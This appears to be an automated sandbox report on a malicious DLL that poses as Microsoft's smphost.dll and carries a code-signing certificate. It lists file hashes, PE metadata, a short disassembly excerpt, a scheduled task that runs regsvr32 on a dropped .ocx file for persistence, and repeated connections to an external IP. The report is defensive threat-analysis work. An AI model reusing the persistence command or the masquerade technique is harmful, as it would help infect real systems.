13:30:09 | API Interceptor | 11x Sleep call for process: loaddll32.exe modified
13:30:37 | Task Scheduler | Run new task: 5507 path: %windir%\system32\regsvr32.exe s>-e C:\ProgramData\6\5507.ocx
13:31:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Process:C:\Windows\SysWOW64\regsvr32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):147656
Entropy (8bit):6.319927202557722
Encrypted:false
SSDEEP:3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
MD5:FC484855692F2A7D1EAE090086A1EB72
SHA1:2E9103747750B40835F58D9E57C2AB75EEAF25F6
SHA-256:E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E
SHA-512:2F6B6E8AA82DC4AA61A540BAE1D98682EC79E73CCFEAF9C273B053C2162F35207842F7AB2F1BC06E927D706EC88ECF209D2C57E86323C38FB43E9D694E624311
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 7%
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):1.0976160892483657
Encrypted:false
SSDEEP:192:1Ezc5b6Vt0H+G0cXlje9+X9yww/u7sNS274ItU:oc16VW+G0ajeYG/u7sNX4ItU
MD5:4B1B0E8495D23C9A6B6258ED7D331BE7
SHA1:2F28B18E4031D078CAB6D972990A1868461365DE
SHA-256:68949226D86CAF86FCD5EC23EBE339B579AD08EA394855F127BB05FE3B3FC66A
SHA-512:3F668FB88564EDAD1B536DF7C0FEE41273FBE6AA7F840FB362D6528BD1D2AC2C1536114E33D266FB65171565E462DCD51D8AFADC84AE17FC7390B286D24FAEB2
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8272
Entropy (8bit):3.6935513744694903
Encrypted:false
SSDEEP:192:Rrl7r3GLNiAr6enG6Y306ugmfJTSZX4NCprb89bV8sf0XHm:RrlsNiU6enG6Yk6ugmfJTS6VPfT
MD5:9AC519D1F30DFC7823590054A1628202
SHA1:534BD1C26250B8D3DE0A52A0092E456659C3BD9E
SHA-256:FEA4B47B5080CC0BFA1E8F8F9721C678BBFD751BE1B37509DC6A63BE7801FE0D
SHA-512:84F933BEC412D14514E2B0042138851A8B564C93696ABA37442DE1A6B12BD207587C16CBE62E705EE14F7E3D7D72C537C697815FB1B0EFBFD647B1C1FDF06734
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4630
Entropy (8bit):4.453126548922244
Encrypted:false
SSDEEP:48:cvIwSD8zs/JgtWI9s84WWSC8Bs8fm8M4JkCFMff+q8p3oKJYhgd:uITfhQuSNDJMfgoqYhgd
MD5:8B06714A9AEBAE2BA184D11D1BC0C1C0
SHA1:F0FC84A0A1D6E1C61A6F71D007F0B6B68F454DC4
SHA-256:B94EFBD2A0C34AC646708D6CB1004ABB13E7E8975639E00905B2881EF17555C2
SHA-512:2D35D224905ACDB0BC899780A943EE4DDF3F396227998E4F8A0EA7DF895006CDD08F6366C41A832E3B3994FC162A8B529A3184CB1DEF8933A74E680DFAC928DA
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Sun Jan 30 21:31:02 2022, 0x1205a4 type
Category:dropped
Size (bytes):122464
Entropy (8bit):2.1643437147123894
Encrypted:false
SSDEEP:768:cBgVbyEqeA2b/V2a8gtuVfHeFNFf5UKXv:Pxr41eF3f5UKX
MD5:5FA42D0F77CA7CD672BA664CA5219DFE
SHA1:93A963564FCF186267C675C7E66244CB14587984
SHA-256:BC158DDC546EA1A1F718D15776E4AA9A39A13E9BF2AB64191E7AAA13DCF46A9A
SHA-512:6F8F9CD35F5543F9CF5E15918FC7463CD8545A1E42B4F8F8ED94A204CCC8FBA2359ACEA2062F45D6105E771A6F9AB2C92692DB50B2EFFCDB7AF92093D4483AD5
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1572864
Entropy (8bit):4.273231081638743
Encrypted:false
SSDEEP:12288:Lv496ASvyWbVus7uYbNPUB6U4Yal9N63JjvSaH9PKku6X/9c9sMRSO:7496ASvyWbVus7f1
MD5:065CCF68DC5FE8D5AC14F5B30BDEEF5B
SHA1:4E531CCF4A0987BE26C8BF5657395BBA28FB8E43
SHA-256:F556D5B952BF5686C3D77229CAAB6AAF9DF46B91620126D50F12444A967A0150
SHA-512:980D2A4527591F094E7156471B1D88499FD45B3A1035F94CB3CBC8F11F1CE64F1594E2D8B1451ADB239F6FC3798F70F666B4BA5F66F3ADE374A9F531249F2F63
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):24576
Entropy (8bit):4.028041512447004
Encrypted:false
SSDEEP:384:VRwp5Rftx1+PJ4XpsF8nk7kdPBqXpSeq5QMVyi6+/2l4Lk41Zd1DoXzn0Lsbwvg:3w3Rftx1kJ4X+F8k7eBqXQeq5QMVyi6I
MD5:FCA21CEF07EB5F05E1E92D9B1645858E
SHA1:35797A6914C2B07CA97855B865CD27AA98573AE8
SHA-256:EF536B299AE7BF8A7A389CB6A2B7CAA22EBEB1886028E85F5209BE8963C2F0A3
SHA-512:93FBB08DAEED81EC8AECD169CD84D94AA5A7AF81C2333BF426DFFBACEAA9FDD328FAFBAE3EA535D9FE0AA2B4537E44E2E80F9A795BAD6EA734096F8644E4781B
Malicious:false
File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):6.319927202557722
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:smphost.dll
File size:147656
MD5:fc484855692f2a7d1eae090086a1eb72
SHA1:2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
SHA512:2f6b6e8aa82dc4aa61a540bae1d98682ec79e73ccfeaf9c273b053c2162f35207842f7ab2f1bc06e927d706ec88ecf209d2c57e86323c38fb43e9d694e624311
SSDEEP:3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
Icon Hash:74f0e4ecccdce0e4
Entrypoint:0x100095e3
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:DYNAMIC_BASE
Time Stamp:0x61C2D9AE [Wed Dec 22 07:54:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:793636b04c2e2f8cfe97a0d2fa1b60e1
Signature Valid:true
Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 12/1/2021 4:00:00 PM 12/2/2022 3:59:59 PM
Subject Chain
  • CN=SATURN CONSULTANCY LTD, O=SATURN CONSULTANCY LTD, S=Essex, C=GB
Version:3
Thumbprint MD5:87CFAD0A22E828FF235A83CA03E90993
Thumbprint SHA-1:430DBEFF2F6DF708B03354D5D07E78400CFED8E9
Thumbprint SHA-256:44DAF53D607937F410C3D300100399514D0EE5B03487E7EAD16DFE324D2C5563
Serial:205483936F360924E8D2A4EB6D3A9F31
Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FAAF49D1C27h
call 00007FAAF49D2029h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FAAF49D1AD3h
add esp, 0Ch
pop ebp
retn 000Ch
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 100153A0h
mov dword ptr [ecx], 10015398h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAAF49D1BFFh
push 1001A634h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAAF49D2AF7h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAAF49CB6ECh
push 1001A538h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAAF49D2ADAh
int3
push ebp
mov ebp, esp
and dword ptr [1001CFF0h], 00000000h
sub esp, 24h
or dword ptr [1001C010h], 01h
push 0000000Ah
call dword ptr [100150C4h]
test eax, eax
je 00007FAAF49D1DCFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 0065746Eh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1ab30 | 0x80 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1abb0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20000 | 0x5694 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x21a00 | 0x26c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e000 | 0x132c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x19f0c | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x19f28 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x15000 | 0x1b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x13939 | 0x13a00 | False | 0.54204816879 | data | 6.52399222454 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x15000 | 0x65be | 0x6600 | False | 0.417662377451 | data | 4.95436624069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1c000 | 0x1a20 | 0xa00 | False | 0.171484375 | DOS executable (block device driver) | 2.41006083543 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x1e000 | 0x132c | 0x1400 | False | 0.748828125 | data | 6.45202754591 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x20000 | 0x5694 | 0x5800 | False | 0.205344460227 | data | 3.76919834084 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
MUI | 0x2010c | 0xf0 | data | English | United States
WEVT_TEMPLATE | 0x201fc | 0x50ca | data | English | United States
RT_VERSION | 0x252c8 | 0x3cc | data | English | United States
DLL | Import
KERNEL32.dll | DeleteCriticalSection, CreateMutexExW, GetPriorityClass, GetProcessId, GetVersion, GetProductInfo, InitializeCriticalSectionEx, FormatMessageA, FormatMessageW, GetConsoleCP, CreateFileW, CloseHandle, GetStringTypeW, SetFilePointerEx, GetProcessHeap, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetLastError, RaiseException, DecodePointer, DisableThreadLibraryCalls, SetFileAttributesW, SetStdHandle, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, InterlockedFlushSList, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, WriteConsoleW
USER32.dll | CharNextW, CreatePopupMenu, GetMessageTime
GDI32.dll | TextOutA, FlattenPath, TextOutW
ADVAPI32.dll | RevertToSelf, IsValidSid, IsValidAcl, IsTokenRestricted, GetSidIdentifierAuthority, CveEventWrite
SHELL32.dll | DuplicateIcon
ole32.dll | CoGetCallerTID, CoCreateInstance, CoInitialize, CoTaskMemAlloc, OleInitialize, CoCancelCall
SHLWAPI.dll | SHStrDupA, SHStrDupW, SHGetThreadRef
RPCRT4.dll | UuidCreate, DceErrorInqTextA, RpcExceptionFilter
Name | Ordinal | Address
DllInstall | 1 | 0x10008630
DllRegisterServer | 2 | 0x10008a90
DllUnregisterServer | 3 | 0x10008be0
Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | smphost.dll
FileVersion | 10.0.21286.1000 (WinBuild.160101.0800)
CompanyName | Microsoft Corporation
ProductName | Microsoft Windows Operating System
ProductVersion | 10.0.21286.1000
FileDescription | Storage Management Provider (SMP) host service
OriginalFilename | smphost.dll
Translation | 0x0000 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 30, 2022 13:33:36.692306995 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.692341089 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.711677074 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.711730003 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.711885929 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.711905956 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.711958885 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.712420940 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.712460041 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.712502956 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.712518930 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.712536097 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.712565899 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.712888956 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.712944031 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.712985039 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.713001013 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.713016987 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.713053942 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.716202974 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.716242075 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.716309071 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.716326952 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.716351986 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.716859102 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.726695061 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.737062931 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.737106085 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.737165928 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.737204075 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.737227917 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.737469912 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738089085 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738126993 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738171101 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738188028 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738215923 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738243103 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738480091 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738518000 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738553047 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738570929 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738600969 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738624096 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738878965 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738914967 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738955975 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.738972902 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.738997936 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.739022970 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.742286921 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.757966995 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758023977 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758100033 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.758141994 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758162022 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.758348942 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758383989 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758433104 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.758455038 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.758471966 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.758502007 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770067930 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770123959 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770162106 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770179987 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770198107 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770247936 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770277023 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770317078 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770344019 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770361900 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770375967 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770407915 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770724058 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770764112 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770797968 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770813942 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.770832062 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.770863056 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.771059036 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.771099091 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.771126986 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.771148920 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.771166086 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.771188974 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.782461882 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.782501936 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.782551050 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.782568932 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.782596111 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.782648087 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.795584917 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.795623064 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.795679092 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.795696020 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.795747995 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.795762062 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.795944929 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.795983076 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796022892 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796039104 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796053886 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796097994 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796320915 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796372890 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796412945 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796428919 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796444893 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796483040 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796708107 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796744108 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796782017 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796797037 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.796818972 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.796847105 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.806432009 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.806483030 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.806524992 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.806543112 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.806567907 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.806586981 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.806977034 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.807018042 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.807090998 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.807111025 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.807178974 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821413040 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821454048 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821593046 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821610928 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821650028 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821657896 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821794033 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821835041 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821871042 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821894884 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.821911097 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.821938992 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.822220087 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.822257996 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:36.822293997 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:36.822326899 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:37.029886007 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:37.029983997 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:37.237895012 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:37.243109941 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:37.669888020 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:37.669971943 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:38.501880884 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:38.501938105 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:39.829277992 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:39.829317093 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:39.829341888 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:39.829478979 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:39.829495907 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:39.829515934 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:39.829610109 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:39.829623938 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:39.829679966 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:39.829751968 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:46.434705973 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:56.898474932 CET49841443192.168.2.3185.14.31.158
Jan 30, 2022 13:33:56.898525000 CET44349841185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.344065905 CET4984332710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.368030071 CET3271049843185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.368386984 CET4984332710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.379771948 CET4984332710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.446387053 CET3271049843185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.634951115 CET3271049843185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.635226965 CET3271049843185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.635417938 CET4984332710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.646553040 CET4984332710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.670391083 CET3271049843185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.680079937 CET4984432710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.703756094 CET3271049844185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.703938007 CET4984432710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.704222918 CET4984432710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.770370960 CET3271049844185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.951225996 CET3271049844185.14.31.158192.168.2.3
Jan 30, 2022 13:33:57.951392889 CET4984432710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.951442003 CET4984432710192.168.2.3185.14.31.158
Jan 30, 2022 13:33:57.974889040 CET3271049844185.14.31.158192.168.2.3
Jan 30, 2022 13:33:58.100112915 CET4984532710192.168.2.3185.14.31.158
